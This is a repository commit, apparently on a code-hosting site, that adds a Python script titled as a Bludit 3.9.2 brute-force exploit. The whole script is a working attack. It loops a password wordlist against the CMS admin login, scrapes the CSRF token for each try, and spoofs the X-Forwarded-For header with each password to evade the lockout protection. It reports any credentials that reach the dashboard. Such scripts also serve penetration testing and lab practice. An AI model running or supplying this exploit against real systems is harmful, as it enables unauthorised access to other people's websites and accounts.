~nighthawk/bludit-3.9.2-brute-exploit

1986c7d3ac42a73517705cacbf396f63c8f3b41d — Musyoka Ian 5 months ago 02dd533
Create bruteforce.py
1 files changed, 44 insertions(+), 0 deletions(-)

A bruteforce.py
A bruteforce.py => bruteforce.py +44 -0
@@ 0,0 1,44 @@
#!/usr/bin/env python3
import re
import requests

host = "http://127.0.0.1" # change to the appropriate URL

login_url = host + '/admin/login'
username = 'admin' # Change to the appropriate username
fname = "/home/admin/Desktop/test.txt" #change this to the appropriate file you can specify the full path to the file
with open(fname) as f:
    content = f.readlines()
    word1 = [x.strip() for x in content] 
wordlist = word1

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break